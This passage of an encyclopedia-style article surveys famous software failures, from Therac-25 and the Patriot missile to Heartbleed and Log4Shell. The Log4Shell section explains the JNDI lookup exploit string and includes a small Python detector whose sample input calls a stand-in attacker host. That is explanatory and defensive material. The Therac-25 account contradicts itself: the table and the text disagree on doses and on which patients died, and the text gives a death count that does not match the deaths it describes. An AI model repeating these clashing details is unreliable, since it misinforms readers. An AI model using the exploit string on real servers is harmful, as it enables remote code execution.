or transient hardware faults, delaying software scrutiny despite replicated failures in testing.[6]

| Date | Location | Estimated Dose (rads) | Outcome |
|---|---|---|---|
| June 3, 1985 | Kennestone, Georgia | 15,000–20,000 | Patient symptoms; machine paused but no immediate overdose recognition; patient died June 1986 from complications.[7] |
| July 26, 1985 | Hamilton, Ontario | 13,000–17,000 | Severe injury; patient died April 1986.[7] |
| December 1985 | Yakima, Washington | Unknown (high) | Injury; fuse blown, no death.[7] |
| March 21, 1986 | Tyler, Texas | 16,500–25,000 | Severe burns; patient died months later.[7] |
| April 11, 1986 | Tyler, Texas | ~25,000 | Severe injury requiring intervention.[7] |
| January 17, 1987 | Yakima, Washington | 8,000–10,000 | Severe injury; hip necrosis.[7] |
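The timing dependence described above can be made concrete with a deliberately simplified sketch (a toy model, not AECL's actual code): a setup task latches whatever mode it observes at the moment it runs, so an operator edit that arrives a moment after the latch leaves the hardware configured for the stale mode while the screen shows the new one.

```python
# Toy model of a Therac-25-style race (illustrative only, not AECL's code).
# A shared "requested mode" is read by a setup task; if a fast operator edit
# lands after the setup task has already latched the value, the hardware
# position no longer matches the operator's on-screen selection.

class ToyMachine:
    def __init__(self):
        self.requested_mode = "xray"   # operator's initial on-screen selection
        self.turntable = None          # mode the hardware actually latched

    def setup_task(self):
        # latches whatever mode it happens to see *right now*
        self.turntable = self.requested_mode

def run(edit_arrives_in_time: bool):
    m = ToyMachine()
    if edit_arrives_in_time:
        m.requested_mode = "electron"  # edit lands before setup runs
        m.setup_task()
    else:
        m.setup_task()                 # setup latches the stale "xray" value
        m.requested_mode = "electron"  # rapid edit arrives a moment too late
    return m.requested_mode, m.turntable

print(run(True))   # ('electron', 'electron') - screen and hardware agree
print(run(False))  # ('electron', 'xray')     - screen and hardware disagree
```

Because the real system ran input handling and hardware setup as concurrent tasks sharing state, whether the mismatch occurred depended purely on input timing, which is why it surfaced only with unusually fast, practiced operators.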
Patriot Missile System (1991)
On February 25, 1991, during Operation Desert Storm, a Patriot missile battery at Dhahran Airbase, Saudi Arabia, failed to track and intercept an incoming Iraqi Scud missile due to a software defect in its weapons control computer.[8] The Scud struck a U.S. Army barracks approximately 100 meters away, killing 28 American soldiers and wounding about 100 others.[8][9] The system's radar detected the incoming threat, but the tracking algorithm produced an erroneous predicted position, preventing engagement.[8] The defect stemmed from a fixed-point arithmetic precision loss in calculating elapsed runtime since system boot. Time was stored as an integer count, incremented in 0.1-second units (tenths of seconds).[10] For trajectory computations, this count was multiplied by 0.1 to yield seconds, but the 24-bit fixed-point representation of 1/10 truncated its repeating binary expansion (0.000110011001100...₂), introducing an error of approximately 9.5 × 10⁻⁸ seconds with each 0.1-second increment.[10] This error accumulated linearly; after roughly 100 hours of continuous operation without reboot—as was the case at Dhahran—the discrepancy totaled 0.3433 seconds.[8][10] At the Scud's speed of about 1,676 meters per second, the 0.3433-second offset translated to a range error of approximately 687 meters, shifting the missile's predicted location outside the system's narrow "range gate" for validated tracking.[8][10] Without a match to this gate, the Patriot discarded the track as invalid and did not fire. A corrective software patch addressing the precision issue had been released on February 16 and applied to some batteries, but wartime logistics delayed its arrival and installation at Dhahran until February 26.[8] The U.S.
General Accounting Office (GAO) report on the incident attributed the failure to this timekeeping error, noting inadequate pre-deployment testing for extended runtimes despite prior indications of drift from Israeli operations.[8] Recommendations included rigorous endurance validation and algorithmic reviews for future updates, underscoring vulnerabilities in embedded real-time systems reliant on finite-precision arithmetic.[8] The event prompted reboots of other Patriot batteries to reset clocks and accelerated patch deployments across theater units.[8]
Therac-25 Overdose Incidents
The Therac-25 overdose incidents comprised six cases of massive radiation overexposure between June 1985 and January 1987, resulting in three patient deaths and three severe injuries. These events were attributed to software flaws, including race conditions during operator input that permitted the machine to fire unmodulated high-energy electron beams without the required scattering foil, delivering doses estimated at 8,000 to 25,000 rads—far exceeding intended therapeutic levels of 100 to 200 rads. Operators frequently encountered the vague "Malfunction 54" error message, which lacked diagnostic detail and encouraged overriding safety interlocks.[6] On June 3, 1985, at Kennestone Regional Medical Center in Marietta, Georgia, a patient scheduled for a 200-rad electron beam treatment received approximately 16,500 rads after the operator rapidly edited parameters and initiated the beam, triggering Malfunction 54; the patient suffered extensive burns requiring skin grafts and hospitalization but ultimately survived.[6][11] A similar error recurred on July 26, 1985, at the Ontario Cancer Foundation Clinic in Hamilton, Ontario, Canada, where a patient intended for a 100-rad dynamic electron treatment absorbed around 16,500 rads following hasty data entry and beam activation under Malfunction 54 conditions; the victim experienced acute radiation syndrome and burns, leading to death several months later.[6][11] In December 1985 at Yakima Valley Memorial Hospital in Yakima, Washington, a patient received an overdose of about 8,000–10,000 rads during a planned 128-rad treatment due to a software timing issue in mode switching, initially presenting as skin erythema that escalated to severe injury; the patient survived with lasting damage.[6] On March 21, 1986, at East Texas Cancer Center in Tyler, Texas, another patient was overdosed with roughly 16,500 rads instead of 180 rads when parameter changes preceded beam-on without updating the turntable position, bypassing 
interlocks; symptoms included paralysis and burns, culminating in death in August 1986.[6][11] The following incident on April 11, 1986, at the same Tyler facility involved an 8,000-rad delivery versus 200 rads intended, again under Malfunction 54 after rapid setup; the patient endured fatal burns and died in May 1986.[6][11] The final known overdose struck on January 17, 1987, back at Yakima Valley Memorial Hospital, administering 10,000–13,000 rads in place of 100 rads due to a race condition in input handling and interlock failure; the patient developed irreversible spinal cord damage and perished in April 1987.[6][11] In response to accumulating reports, Atomic Energy of Canada Limited (AECL) notified the U.S. Food and Drug Administration (FDA) on April 15, 1986; the FDA subsequently declared the Therac-25 defective on May 2, 1986, mandating a corrective action plan, user notifications, and temporary suspension of operations until software and hardware safeguards were implemented.[6][11] These incidents exposed systemic issues in software validation, as prior Therac models had relied on hardware interlocks that the computerized Therac-25 inadequately replicated in code.[6]
Economic and Financial Disruptions
Pentium FDIV Bug (1994)
The Pentium FDIV bug was a defect in the floating-point unit (FPU) of early Intel Pentium (P5) microprocessors, resulting in inaccurate double-precision floating-point division results for specific input pairs.[12] The error manifested in approximately 1 in 9 billion random divisions, with inaccuracies typically appearing from the 14th to 23rd significant bits, though it could propagate in iterative or non-random computations such as those involving small "bruised" integers.[13] Affected processors were those produced before late 1994; Intel incorporated a hardware fix in subsequent revisions by adding transistors to the lookup table circuitry.[14] The bug originated in the FPU's implementation of the radix-4 SRT (Sweeney, Robertson, and Tocher) division algorithm, which relied on a 2048-entry programmable logic array (PLA) lookup table to select quotient digits (±2, ±1, or 0) based on chopped mantissas of the dividend and divisor.[12] A design error caused five critical entries to be omitted from this table—specifically, due to the top threshold for the +2 quotient region being set incorrectly low (to 0 instead of 2)—triggering erroneous quotient estimates for divisors whose normalized mantissas exhibited certain patterns, such as six consecutive 1s in specific bit positions.[13] Intel attributed the omission to a scripting mistake during table generation, but die-level analysis revealed an underlying mathematical flaw in the table's boundary definitions, with 16 entries total omitted (11 harmless).[12] Mathematician Thomas R.
Nicely discovered the issue in June 1994 while performing computations on twin primes and other number-theoretic problems using Lynchburg College's three Pentium-equipped computers, initially suspecting software before isolating it to the hardware by October.[14] He observed discrepancies in the ninth decimal place of division results, such as erroneous outputs from operations like 4,195,835 / 3,145,727, and publicly disclosed findings via Internet forums after Intel's delayed confirmation.[14] Intel had identified the flaw internally by June 1994 and silently corrected it in chips shipped from September onward, but withheld public notice, prompting criticism for understating its relevance to scientific users.[14] Facing escalating media scrutiny and demands from affected customers, Intel shifted from requiring proof of impact for replacements to offering free exchanges for all affected Pentiums on December 20, 1994, marking the company's first major CPU recall.[15] No software workaround existed, as the table resided in fixed hardware logic rather than updatable microcode.[15] The episode incurred $475 million in costs for Intel, primarily from replacements and lost credibility, though it caused no broader financial market disruptions or safety incidents.[15] It highlighted vulnerabilities in automated hardware design tools and lookup-table verification, influencing subsequent processor validation processes.[12]
Knight Capital Group Trading Glitch (2012)
On August 1, 2012, Knight Capital Americas LLC, a major high-frequency trading firm and market maker, experienced a catastrophic software malfunction in its Smart Market Access Routing System (SMARS) during the deployment of new code to support the New York Stock Exchange's supplemental liquidity provider pilot program.[16] The error activated dormant, repurposed code from an older trading strategy called Power Peg, which had not been fully disabled or tested in the production environment.[17] This led to the automated system generating and executing millions of unintended orders, primarily buying shares at inflated prices and selling at depressed ones, without corresponding customer orders or risk management overrides.[16] The glitch unfolded over approximately 45 minutes starting around 9:15 a.m. ET, during which SMARS executed over 4 million trades across 148 NYSE-listed stocks, accumulating long positions worth about $7 billion before partial unwinding.[17] Knight ultimately realized a $440 million net trading loss after liquidating the erroneous positions later that day, representing nearly all of its capital at the time.[18] The firm's shares plummeted 75% in value, closing at $2.58 from an opening of $10.29, triggering a near-collapse that required emergency capital infusion.[16] The root cause stemmed from two key failures identified by the U.S. 
Securities and Exchange Commission (SEC): first, Knight reused untested source code from the defunct Power Peg system without adequately validating its integration into the new SMARS module, including overlooking a critical flag set to "1" (active) instead of "0" (inactive), which triggered rogue order routing logic; second, the firm lacked sufficient pre-trade controls for its sponsored access arrangements, allowing the erroneous orders to flood exchanges unchecked.[17] Knight's internal testing in a simulated environment failed to replicate the production scenario, as it did not account for the specific sequence of incoming customer orders that activated the bug.[16] No evidence of intentional misconduct was found, but the incident exposed vulnerabilities in rapid software deployment practices within automated trading systems.[17] In the aftermath, Knight survived short-term through a $400 million bailout from investors but was acquired by Getco LLC (now part of KCG Holdings) in a deal valuing the firm at $1.4 billion, effectively marking its operational demise as an independent entity.[16] The SEC charged Knight with violations of Rule 15c3-5 under the Securities Exchange Act of 1934 for inadequate risk management controls over market access, imposing a $12 million civil penalty—the largest such fine at the time—and mandating enhanced compliance measures.[17] The event prompted regulatory scrutiny of high-frequency trading firms, highlighting the systemic risks of unproven code in financial markets, though no broader market disruption occurred due to the self-contained nature of the losses.[16]
2010 Flash Crash
On May 6, 2010, the U.S. equity markets experienced a sudden and severe decline known as the Flash Crash, with the Dow Jones Industrial Average plummeting approximately 1,000 points (about 9%) between 2:32 p.m. and 2:47 p.m. EDT before recovering most losses by the end of the trading day.[19][20] The event erased and then restored over $1 trillion in market value within minutes, involving nearly 2 billion shares traded in equities between 2:40 p.m. and 3:00 p.m., far exceeding normal volumes.[19] More than 20,000 trades across over 300 securities executed at prices at least 60% away from pre-crash values, including anomalous prices like $0.01 per share for some stocks, prompting subsequent cancellations of trades deemed erroneous.[19][20] The primary trigger was an automated trading algorithm employed by a large mutual fund to execute a sell order for 75,000 E-Mini S&P 500 futures contracts, valued at roughly $4.1 billion, initiated at 2:32 p.m. EDT on the Chicago Mercantile Exchange.[19] This algorithm was programmed to sell aggressively by targeting 9% of the volume from the previous minute, without incorporating constraints on price or time, resulting in the full execution within 20 minutes amid thinning liquidity.[19] The design flaw in this execution strategy—prioritizing volume over market impact—generated disproportionate sell pressure, as the algorithm continued selling into a declining market without adaptive pauses or price sensitivity.[19] High-frequency trading (HFT) firms, which accounted for about 50% of trading volume during the episode, initially absorbed the sales but then rapidly sold positions, engaging in "hot-potato" volume where contracts were passed between traders with minimal net change in ownership, further eroding liquidity.[19] Interactions among automated systems amplified the disruption: between 2:45:13 p.m.
and 2:45:27 p.m., buy-side liquidity in E-Mini futures dropped to $58 million, less than 1% of morning levels, as HFT algorithms withdrew amid extreme volatility and some proprietary systems halted trading due to predefined risk thresholds triggered by rapid price swings.[19] In equities, similar dynamics led to reliance on stub quotes (distant placeholder bids/offers) when genuine liquidity vanished, executing trades at irrationally low prices.[19][20] The joint investigation by the U.S. Securities and Exchange Commission (SEC) and Commodity Futures Trading Commission (CFTC) concluded that while no single software coding error caused the crash, the confluence of the flawed sell algorithm and HFT behaviors—neither of which deviated from their programmed logic—exposed vulnerabilities in automated market structures reliant on rapid, high-volume electronic execution.[19] In response, regulators implemented circuit breakers, including single-stock pauses and market-wide limits, to curb similar cascades from algorithmic interactions.[19] The episode highlighted how algorithm design lacking robustness to feedback loops could propagate shocks across interconnected futures and cash markets, though subsequent analyses affirmed that HFT firms did not initiate the decline but contributed through liquidity provision patterns that prioritized immediacy over stability during stress.[19]
Space and Aerospace Failures
Ariane 5 Rocket Explosion (1996)
The maiden flight of the Ariane 5 rocket, designated Flight 501, launched on June 4, 1996, at 09:33:59 local time from Kourou, French Guiana, carrying the four Cluster scientific satellites, valued at approximately US$500 million. Approximately 37 seconds after main engine ignition—equivalent to about 40 seconds into the flight—the rocket deviated from its trajectory at an altitude of around 3,700 meters, leading to structural breakup and explosion; the onboard self-destruct system activated shortly thereafter, scattering debris over an area of 12 square kilometers.[21][22] The root cause was a software fault in the Inertial Reference System (SRI), which provided guidance and attitude data to the flight control systems. The SRI software, reused from the Ariane 4 without full adaptation to the Ariane 5's steeper ascent trajectory, executed an unnecessary alignment function that processed the horizontal velocity component (designated BH). This 64-bit floating-point value exceeded the range representable by a 16-bit signed integer, triggering an operand error and unhandled exception that caused the active SRI processor to shut down at H0 + 36.7 seconds.[22][23] The backup SRI, operating in cold redundancy but synchronized with the primary, encountered the identical fault and also failed, resulting in total loss of guidance data and handover to the operations computer, which could not compensate.[22] This overflow stemmed from inadequate specification of Ariane 5 trajectory parameters in the SRI design and absence of range checks or exception handling for such values, despite prior assumptions of safety margins derived from Ariane 4 data.[21][23] Testing failures contributed, as simulations and reviews relied on Ariane 4 profiles and excluded Ariane 5-specific conditions due to schedule pressures, failing to expose the vulnerability despite the software's proven reliability in prior missions.[23] The inquiry board, reporting on July 19, 1996, attributed the
catastrophe to systemic deficiencies in software engineering, including incomplete requirements capture, design errors, and insufficient validation, rather than isolated coding mistakes.[22] In response, the European Space Agency corrected the SRI software by disabling the offending function, adding protections against overflows, and revising qualification processes to incorporate full-system simulations with Ariane 5 parameters. Subsequent flights, starting with Flight 502 in October 1997, incorporated these fixes, enabling Ariane 5's operational success, though the incident underscored the risks of software reuse without rigorous environmental revalidation in safety-critical systems.[21][22]
Mars Climate Orbiter Loss (1999)
The Mars Climate Orbiter (MCO), a NASA unmanned spacecraft, launched aboard a Delta II rocket from Cape Canaveral on December 11, 1998, as part of the Mars Surveyor '98 program.[24] Its primary objectives included mapping the Martian surface, monitoring daily and seasonally varying atmospheric dust and water vapor patterns to study climate dynamics, and serving as a communications relay for the Mars Polar Lander.[24] The 638-kilogram probe traveled approximately 669 million kilometers over nine months before attempting orbital insertion around Mars.[25] Contact with the spacecraft was lost on September 23, 1999, at 09:04 UTC during the planned Mars orbit insertion burn, when it passed behind the planet relative to Earth.[24] Post-loss analysis by NASA's Mishap Investigation Board determined that the orbiter had entered the Martian atmosphere at an altitude of about 57 kilometers—far below the targeted periapsis of 140 to 150 kilometers—causing aerodynamic forces to destroy it.[24] Trajectory reconstruction revealed an unexpectedly high spacecraft velocity change of 64.1 meters per second, compared to the pre-insertion estimate of 50 meters per second, confirming the low-altitude entry.[26] The root cause was a discrepancy in measurement units within the navigation software interface between ground-based systems and the flight software. 
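The magnitude of that mismatch can be sketched in a few lines (the function names below are invented for illustration; they stand in for the ground and flight sides of the interface):

```python
# Minimal sketch of an MCO-style unit mismatch (function names invented for
# illustration; the real interface involved Lockheed Martin's ground software
# feeding NASA's navigation software).
LBF_S_TO_N_S = 4.448222  # 1 pound-force second expressed in newton-seconds

def ground_model_output(impulse):
    # ground side computes a thruster impulse in pound-force seconds (lbf*s)
    return impulse

def flight_navigation_input(value):
    # flight side assumes the same number is already in newton-seconds (N*s),
    # so no conversion happens at the interface
    return value

delivered_lbf_s = 10.0                          # physically delivered impulse
true_n_s = delivered_lbf_s * LBF_S_TO_N_S       # what should have been modeled
modeled_n_s = flight_navigation_input(ground_model_output(delivered_lbf_s))

print(true_n_s / modeled_n_s)  # ~4.45: every small burn is underweighted
```

Because each modeled firing was too small by the same factor of about 4.45, and the firings were frequent, the trajectory error accumulated gradually rather than appearing as one obvious fault.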
Specifically, the "SM_FORCES" module in Lockheed Martin's ground software generated outputs for small thruster firings in English units of pound-force seconds (lbf·s), while the spacecraft's navigation software, per the Software Interface Specification, expected metric units of newton-seconds (N·s).[24] This mismatch introduced a systematic error factor of 4.45 (since 1 lbf ≈ 4.45 N), leading to underestimation of velocity perturbations from attitude control thrusters, which accumulated over the mission and corrupted the predicted orbit.[24] The error originated in the ground software's failure to convert units, despite NASA specifying metric standards, and was exacerbated by the thruster firings being classified as non-critical trajectory inputs, evading rigorous validation.[24] Contributing factors included inadequate systems engineering oversight, with insufficient end-to-end testing of the small-forces model against flight software, and poor communication between the navigation team—unfamiliar with the spacecraft's configuration—and the software developers.[24] A planned Trajectory Correction Maneuver (TCM-5) was skipped due to time constraints, further masking the accumulating discrepancy.[24] The mission's total cost was approximately $327 million, encompassing development, launch, and operations, though the spacecraft itself was valued at $125 million.[27][25] The investigation board issued recommendations emphasizing unit consistency verification in all software interfaces, independent audits of critical navigation code, and enhanced training on systems integration to prevent similar failures in future missions.[24] This incident underscored the critical role of precise unit handling in software for space navigation, where even small modeling errors can propagate to mission-ending deviations without robust validation protocols.[24]
Infrastructure and Utilities
Northeast Blackout of 2003
The Northeast Blackout of 2003 occurred on August 14, 2003, disrupting electrical service to approximately 50 million people across eight U.S. states and Ontario, Canada, with outages lasting from hours to two days in affected areas.[28] The initiating events involved high-voltage transmission lines in northeastern Ohio, operated by FirstEnergy Corporation, sagging under heavy load and contacting overgrown trees, causing three 345 kV lines to trip sequentially between 3:05 p.m. and 3:41 p.m. EDT.[28] These failures overloaded adjacent lines, leading to a cascading separation of the power grid that removed over 61,800 megawatts of load.[28] A key contributing factor was a software defect in FirstEnergy's energy management system (EMS), the GE XA/21, which handled monitoring, alarms, and event logging.[29] The bug manifested as a race condition in the Unix-based alarm and event processor: when confronted with a high volume of simultaneous events—such as the rapid influx from line trips—the system entered an infinite loop while attempting to write log entries to a circular buffer, causing the alarm function to fail silently without notifying operators or triggering backups.[29][30] This rendered control room personnel unaware of the escalating grid instability for over an hour, delaying remedial actions like load shedding or line reconfiguration.[31] The U.S.-Canada Power System Outage Task Force's final report identified inadequate vegetation management, operator training deficiencies, and reliability coordination failures as primary causes, but subsequent analysis by GE Energy confirmed the EMS software flaw as the reason for the unalarmed state, exacerbating the cascade.[28][31] GE issued patches for the XA/21 systems in use by multiple utilities, and the incident prompted mandatory reliability standards under the North American Electric Reliability Corporation, including enhanced EMS redundancy and software validation.[31] Economic impacts were estimated at $6 
billion to $10 billion, including lost productivity, spoiled goods, and emergency response costs.[29]
Ukraine Power Grid Attack (2015, software component)
The 2015 cyber attack on Ukraine's power grid, occurring on December 23, targeted three regional electric distribution companies—Prykarpattyaoblenergo, Kyivoblenergo, and possibly others—resulting in outages affecting approximately 230,000 customers for durations of 1 to 6 hours. Attackers, attributed by cybersecurity analyses to the Russian-linked Sandworm group, exploited software vulnerabilities and deployed custom malware to gain persistent access to corporate IT networks, which were inadequately segmented from operational technology (OT) systems controlling substations. Initial compromise began in spring 2015 through spear-phishing campaigns delivering BlackEnergy version 3 malware via malicious Microsoft Office attachments, such as Excel files with embedded macros that executed upon user interaction.[32][33][34] BlackEnergy, a modular information-stealing Trojan originally developed for DDoS and espionage, served as the primary backdoor in the attack, enabling remote command-and-control (C2) communications, credential harvesting, and lateral movement across Windows-based systems. Its plugin architecture allowed customization for industrial targets, including modules for keylogging and data exfiltration, which attackers used to map networks and escalate privileges over months of reconnaissance. Once inside, intruders pivoted to OT environments via infected jump servers and VPN connections, leveraging weak or default credentials to access human-machine interfaces (HMIs) connected to supervisory control and data acquisition (SCADA) systems, including Siemens SIPROTEC devices.
No zero-day exploits in core grid software were reported; instead, the attack capitalized on unpatched Windows vulnerabilities, insecure remote access protocols (e.g., lacking multifactor authentication), and flat network designs that permitted IT-to-OT traversal without air-gapping or anomaly detection.[35][36][37] During the disruption phase, attackers manually issued commands from external locations to open circuit breakers at 11 substations, simulating operator actions through compromised HMIs while suppressing alarms to delay detection. Concurrently, they deployed KillDisk—a destructive wiper malware variant—to overwrite master boot records (MBRs) on infected workstations, erasing logs and hindering forensic recovery and system restoration; this component targeted both IT and select OT endpoints but spared primary control servers to maintain operational access. Post-attack, wipers like KillDisk were analyzed as extensions of BlackEnergy campaigns, with code similarities indicating shared development by state-affiliated actors. The software's efficacy stemmed from its adaptability to legacy ICS protocols rather than novel bugs, underscoring systemic flaws in utility software configurations, such as outdated operating systems (e.g., Windows XP) and absent endpoint protection tailored for air-gapped environments.[38][39][32] Recovery relied on manual interventions, including on-site technician overrides of breakers and clean-room rebuilds of wiped systems, highlighting the absence of resilient software redundancies like immutable backups or behavioral monitoring in the targeted environments. Technical reports from joint industry analyses emphasized that the attack's success derived from cascading software weaknesses—phishing-vulnerable email clients, credential-storing applications without encryption, and SCADA interfaces exposing control logic—rather than a singular bug, though BlackEnergy's evasion of antivirus via packed executables amplified persistence. 
Subsequent U.S. government alerts classified these tactics as indicative of advanced persistent threats (APTs) targeting critical infrastructure, prompting recommendations for micro-segmentation and protocol whitelisting in ICS software stacks.[33][40][32]
Date and Time Handling
Year 2000 (Y2K) Problem
The Year 2000 (Y2K) problem stemmed from the widespread use of two-digit representations for years in computer software and firmware, a practice originating in the 1960s and 1970s to conserve limited storage space in early systems. This convention encoded years like 1999 as "99," but upon reaching "00" on January 1, 2000, many programs incorrectly interpreted it as 1900, potentially causing failures in date-dependent calculations such as eligibility determinations, financial accruals, and chronological sorting. The issue affected legacy mainframe applications written in languages like COBOL, as well as embedded systems in devices ranging from elevators to nuclear plant controls, with risks cascading through interconnected infrastructures like power grids and banking networks.[41][42] Remediation strategies included date expansion, which converted all two-digit years to four digits for a permanent fix, though it was labor-intensive and costly; and windowing, a temporary workaround assuming two-digit years within a sliding 100-year band (e.g., 00–49 as 2000–2049, 50–99 as 1950–1999) to extend functionality for decades without full rewrites. Governments and corporations undertook extensive inventories, testing, and upgrades, with the U.S. federal government allocating approximately $8.7 billion by mid-1999, including over $3 billion spent through fiscal year 1998 across major agencies. Private sector expenditures were substantial, with estimates for U.S. businesses around $50 billion and global totals reaching $300–600 billion, exemplified by investments from firms like General Motors ($565 million) and Citicorp ($600 million). These efforts involved compliance acts, such as the U.S. 
Year 2000 Information and Readiness Disclosure Act of 1998, to facilitate information sharing and liability protections.[43][44][45][41] The transition on January 1, 2000, resulted in minimal disruptions, with no widespread systemic failures reported in critical infrastructures despite pre-rollover simulations revealing errors in unremediated code. Isolated incidents occurred, such as minor glitches in some Japanese vending machines and European billing systems, but these were quickly resolved without broader economic or safety impacts. The absence of catastrophe is attributable to proactive global remediation, which addressed vulnerabilities in over 99% of U.S. federal mission-critical systems by late 1999, rather than inherent overhyping, as evidenced by documented test failures in legacy environments prior to fixes. Post-event analyses confirmed that without these interventions, date miscalculations could have triggered real operational breakdowns in sectors reliant on precise chronology.[41][44]
Unix Millennium Bug (2038 Problem)
The Unix Millennium Bug, commonly referred to as the Year 2038 problem or Y2038, stems from the representation of time in many Unix-like operating systems and software using a 32-bit signed integer for the time_t data type, which tracks seconds elapsed since the Unix epoch of January 1, 1970, 00:00:00 UTC.[46] This integer's maximum value of 2,147,483,647 seconds—equivalent to 2³¹ - 1—will be reached at 03:14:07 UTC on January 19, 2038, after which any increment causes an overflow, wrapping the value to a negative number starting at -2,147,483,648.[47] Systems interpreting this negative value as seconds before the epoch will display or process dates regressing to December 13, 1901, 20:45:52 UTC, potentially disrupting timestamp-dependent operations such as file systems, databases, logging, and scheduling.[48]
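The wraparound and the resulting 1901 date can be reproduced exactly by simulating a signed 32-bit counter (a sketch; real systems do this arithmetic in C, but the result is identical):

```python
# Simulate a signed 32-bit time_t overflowing one second past its maximum.
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
T_MAX = 2**31 - 1  # 2,147,483,647: the last representable second

# 03:14:07 UTC on January 19, 2038
print(EPOCH + timedelta(seconds=T_MAX))

# One more second wraps a signed 32-bit integer around to its minimum value
wrapped = struct.unpack("<i", struct.pack("<I", T_MAX + 1))[0]
print(wrapped)  # -2147483648

# Interpreted as seconds *before* the epoch: 20:45:52 UTC, December 13, 1901
print(EPOCH + timedelta(seconds=wrapped))
```

The pack/unpack pair reinterprets the out-of-range unsigned value as a signed 32-bit integer, which is exactly the reinterpretation an overflowing C counter undergoes.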
The root cause lies in the historical choice of a 32-bit time_t in the C programming language standard, adopted by POSIX for portability across Unix variants, which sufficed for systems designed in the 1970s when 68 years of runtime was deemed ample.[46] This limitation primarily impacts 32-bit architectures, embedded devices, and legacy applications that have not migrated to 64-bit time representations, as 64-bit systems typically employ a 64-bit time_t capable of handling timestamps until approximately year 292 billion.[49] Consequences could include software failures like incorrect date validations, corrupted backups, or halted processes in uninterruptible power supplies, medical equipment, or industrial controls relying on absolute time, though the scope is narrower than the Y2K issue due to fewer affected 32-bit deployments in 2038.[50]
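The headroom claimed for a 64-bit time_t is easy to verify with back-of-the-envelope arithmetic (using the average Gregorian year of 31,556,952 seconds):

```python
# How far a signed 64-bit time_t reaches, in years past 1970.
SECONDS_PER_YEAR = 31_556_952     # average Gregorian year length
T64_MAX = 2**63 - 1               # 9,223,372,036,854,775,807 seconds

years_of_headroom = T64_MAX / SECONDS_PER_YEAR
print(f"{years_of_headroom:.3e}")  # roughly 2.9e11, i.e. ~292 billion years
```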
Mitigation strategies involve recompiling software with 64-bit time_t support, available in libraries like glibc since version 2.34 (2021), or adopting alternative time APIs such as struct timespec with nanosecond precision.[49] Linux on 64-bit processors has been largely immune since its inception, as it defaults to a 64-bit time_t, but building 32-bit targets with 64-bit time support requires explicit flags such as -D_TIME_BITS=64, which glibc requires to be combined with -D_FILE_OFFSET_BITS=64.[48] Efforts by bodies like the Linux Foundation and vendors such as Wind River have focused on auditing and patching embedded firmware, with static-analysis tools detecting vulnerable code patterns; however, billions of IoT and legacy devices may remain unpatched, risking isolated failures rather than systemic collapse.[50] As of 2025, awareness has prompted proactive updates in major distributions, reducing anticipated impact compared to unaddressed scenarios.[49]
Security and Encryption Flaws
Heartbleed Bug (2014)
The Heartbleed bug, designated CVE-2014-0160, was a critical buffer over-read vulnerability in the OpenSSL cryptographic software library, enabling remote attackers to extract sensitive data from the memory of affected systems.[51] It stemmed from a flaw in the implementation of the heartbeat extension for TLS and DTLS protocols, where a missing bounds check allowed malicious packets to trigger the return of up to 64 kilobytes of process memory per request, potentially disclosing private keys, usernames, passwords, cookies, and other confidential information without detection or server logs.[52][53] The bug affected OpenSSL versions 1.0.1 through 1.0.1f, released between March 2012 and January 2014, while earlier stable branches like 1.0.0 and 0.9.8 remained unaffected because they lacked the heartbeat feature.[54] The vulnerability was discovered independently in early 2014: Google security engineer Neel Mehta reported it privately to the OpenSSL Project on April 1, and researchers at the Finnish security firm Codenomicon found it days later and coordinated disclosure with OpenSSL.[54] OpenSSL released version 1.0.1g on April 7, 2014, the day of public disclosure, adding the bounds validation needed to prevent the memory leak.[53] The bug had been present since the introduction of the heartbeat extension in OpenSSL 1.0.1, released on March 14, 2012, representing a single missing bounds check on the attacker-supplied payload length that evaded code review by OpenSSL's under-resourced development team, which operated on a volunteer basis with limited funding.[51] The impact was widespread, as OpenSSL powered approximately two-thirds of secure web servers at the time, with a Netcraft survey in April 2014 indicating the potentially affected Apache and nginx servers together hosted over 66% of active sites.[55] Attackers could repeatedly exploit it to harvest data, compromising encryption integrity and enabling 
man-in-the-middle attacks, though no evidence emerged of mass pre-disclosure exploitation by state actors despite speculation; post-disclosure scans revealed persistent unpatched systems for years.[52] Remediation required not only patching OpenSSL but also revoking and regenerating affected private keys and certificates, as leaked keys rendered prior and subsequent sessions insecure, affecting millions of users and organizations including major services like Yahoo and Flickr.[53] Exploitation relied on crafting heartbeat request packets with falsified payload lengths, tricking the server into echoing adjacent process memory back to the attacker, who could chain requests to map larger memory regions over time.[51] This memory disclosure occurred silently, bypassing typical security logging, and was rated CVSS 5.0 for low complexity and no privileges required, underscoring OpenSSL's role as a de facto standard despite its maintenance challenges.[56] The incident highlighted systemic risks in open-source cryptography libraries, prompting increased funding for OpenSSL via initiatives like the Linux Foundation's Core Infrastructure Initiative, though adoption of alternatives like LibreSSL gained limited traction.[54]
Log4Shell Vulnerability (2021)
The Log4Shell vulnerability, designated CVE-2021-44228, is a remote code execution flaw in the Apache Log4j 2 logging library for Java applications, affecting versions from 2.0-beta9 through 2.14.1.[57] This library, used extensively in enterprise software, cloud services, and web applications for logging events, enables attackers to execute arbitrary code on vulnerable servers when untrusted input is logged.[58] The issue stems from Log4j's default configuration performing Java Naming and Directory Interface (JNDI) lookups on specially crafted log messages containing lookup patterns like ${jndi:ldap://malicious-server/a}, which trigger remote resource fetching and deserialization leading to code execution.[59] With a CVSS v3.1 base score of 10.0, it represents one of the most severe software vulnerabilities due to its ease of exploitation and broad applicability across platforms.[57]
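A minimal, illustrative detector for the basic exploit string might look like the following Python sketch. The function name and sample inputs are hypothetical, and real attackers quickly adopted nested-lookup obfuscations (e.g. ${${lower:j}ndi:...}) that defeat naive signatures like this one, which is why patching rather than input filtering was the recommended remedy:

```python
import re

# Naive signature for the basic exploit string; nested-lookup obfuscations
# such as ${${lower:j}ndi:...} evade this simple check.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(log_line: str) -> bool:
    """Return True if a log line contains the unobfuscated JNDI lookup pattern."""
    return bool(JNDI_PATTERN.search(log_line))

print(looks_like_log4shell("User-Agent: ${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell("GET /index.html HTTP/1.1"))                       # False
```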
